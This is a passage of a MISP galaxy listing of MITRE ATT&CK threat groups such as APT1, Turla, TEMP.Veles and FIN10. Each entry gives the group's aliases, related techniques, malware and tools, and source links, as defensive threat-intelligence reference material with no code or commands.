uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ObliqueRAT - S0644" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="DarkComet - S0334" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Peppy - S0643" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

Table 4485. Table References
Links
https://attack.mitre.org/groups/G0134
https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf
https://securelist.com/transparent-tribe-part-1/98127/
https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html
https://www.secureworks.com/research/threat-profiles/copper-fieldstone
https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/
https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/

Ferocious Kitten - G0137

[Ferocious Kitten](https://attack.mitre.org/groups/G0137) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Ferocious Kitten - G0137"

Ferocious Kitten - G0137 is also known as:

Ferocious Kitten

View relationships graph

Ferocious Kitten - G0137 has relationships with:

uses: misp-galaxy:mitre-tool="BITSAdmin - S0190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="MarkiRAT - S0652" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4486. Table References
Links
https://attack.mitre.org/groups/G0137
https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

APT-C-36 - G0099

[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.(Citation: QiAnXin APT-C-36 Feb2019)

The tag is: misp-galaxy:mitre-intrusion-set="APT-C-36 - G0099"

APT-C-36 - G0099 is also known as:

APT-C-36
Blind Eagle

View relationships graph

APT-C-36 - G0099 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Imminent Monitor - S0434" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4487. Table References
Links
https://attack.mitre.org/groups/G0099
https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/

TEMP.Veles - G0088

[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)

The tag is: misp-galaxy:mitre-intrusion-set="TEMP.Veles - G0088"

TEMP.Veles - G0088 is also known as:

TEMP.Veles
XENOTIME

View relationships graph

TEMP.Veles - G0088 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1583.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TRITON - S0609" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1329" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1311" with estimative-language:likelihood-probability="almost-certain"

Table 4488. Table References
Links
https://attack.mitre.org/groups/G0088
https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html
https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html [https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ]
https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html
https://dragos.com/resource/xenotime/
https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/

FIN10 - G0051

[FIN10](https://attack.mitre.org/groups/G0051) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)

The tag is: misp-galaxy:mitre-intrusion-set="FIN10 - G0051"

FIN10 - G0051 is also known as:

FIN10

View relationships graph

FIN10 - G0051 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4489. Table References
Links
https://attack.mitre.org/groups/G0051
https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf

APT12 - G0005

[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.(Citation: Meyers Numbered Panda)

The tag is: misp-galaxy:mitre-intrusion-set="APT12 - G0005"

APT12 - G0005 is also known as:

APT12
IXESHE
DynCalc
Numbered Panda
DNSCALC

View relationships graph

APT12 - G0005 has relationships with:

similar: misp-galaxy:threat-actor="IXESHE" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="Ixeshe - S0015" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RIPTIDE - S0003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="HTRAN - S0040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS Calculation - T1568.003" with estimative-language:likelihood-probability="almost-certain"

Table 4490. Table References
Links
https://attack.mitre.org/groups/G0005
http://www.crowdstrike.com/blog/whois-numbered-panda/
https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

APT30 - G0013

[APT30](https://attack.mitre.org/groups/G0013) is a threat group suspected to be associated with the Chinese government. While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: FireEye APT30)(Citation: Baumgartner Golovkin Naikon 2015)

The tag is: misp-galaxy:mitre-intrusion-set="APT30 - G0013"

APT30 - G0013 is also known as:

APT30

View relationships graph

APT30 - G0013 has relationships with:

similar: misp-galaxy:threat-actor="Naikon" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Lotus Panda" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="APT 30" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="SHIPSHAPE - S0028" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BACKSPACE - S0031" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NETEAGLE - S0034" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FLASHFLOOD - S0036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SPACESHIP - S0035" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 4491. Table References
Links
https://attack.mitre.org/groups/G0013
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf
https://securelist.com/the-naikon-apt/69953/

APT1 - G0006

[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-intrusion-set="APT1 - G0006"

APT1 - G0006 is also known as:

APT1
Comment Crew
Comment Group
Comment Panda

View relationships graph

APT1 - G0006 has relationships with:

similar: misp-galaxy:threat-actor="Comment Crew" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CALENDAR - S0025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="GLOOXMAIL - S0026" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Lslsass - S0121" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BISCUIT - S0017" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Pass-The-Hash Toolkit - S0122" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Cachedump - S0119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="WEBC2 - S0109" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="xCmd - S0123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Seasalt - S0345" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1584.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1588.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain registration hijacking - T1326" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obtain/re-use payloads - T1346" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1333" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1312" with estimative-language:likelihood-probability="almost-certain"

Table 4492. Table References
Links
https://attack.mitre.org/groups/G0006
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

Axiom - G0001

[Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti for Windows](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015)

The tag is: misp-galaxy:mitre-intrusion-set="Axiom - G0001"

Axiom - G0001 is also known as:

Axiom
Group 72

View relationships graph

Axiom - G0001 has relationships with:

similar: misp-galaxy:threat-actor="Aurora Panda" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Axiom" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Hydraq - S0203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Hikit - S0009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ZxShell - S0412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"

Table 4493. Table References
Links
https://attack.mitre.org/groups/G0001
http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
https://securelist.com/winnti-more-than-just-a-game/37029/
https://securelist.com/games-are-over/70991/
http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
http://blogs.cisco.com/security/talos/threat-spotlight-group-72

Inception - G0100

[Inception](https://attack.mitre.org/groups/G0100) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.(Citation: Unit 42 Inception November 2018)(Citation: Symantec Inception Framework March 2018)(Citation: Kaspersky Cloud Atlas December 2014)

The tag is: misp-galaxy:mitre-intrusion-set="Inception - G0100"

Inception - G0100 is also known as:

Inception
Inception Framework
Cloud Atlas

View relationships graph

Inception - G0100 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PowerShower - S0441" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="VBShower - S0442" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4494. Table References
Links
https://attack.mitre.org/groups/G0100
https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies
https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/

Turla - G0010

[Turla](https://attack.mitre.org/groups/G0010) is a Russian-based threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies since 2004. Heightened activity was seen in mid-2015. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware. [Turla](https://attack.mitre.org/groups/G0010)’s espionage platform is mainly used against Windows machines, but has also been seen used against macOS and Linux machines.(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Turla - G0010"

Turla - G0010 is also known as:

Turla
Group 88
Belugasturgeon
Waterbug
WhiteBear
VENOMOUS BEAR
Snake
Krypton

View relationships graph

Turla - G0010 has relationships with:

similar: misp-galaxy:threat-actor="Turla Group" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="APT 26" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="Gazer - S0168" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Mosquito - S0256" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Epic - S0091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Uroburos - S0022" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="nbtstat - S0102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Arp - S0099" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Kazuar - S0265" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
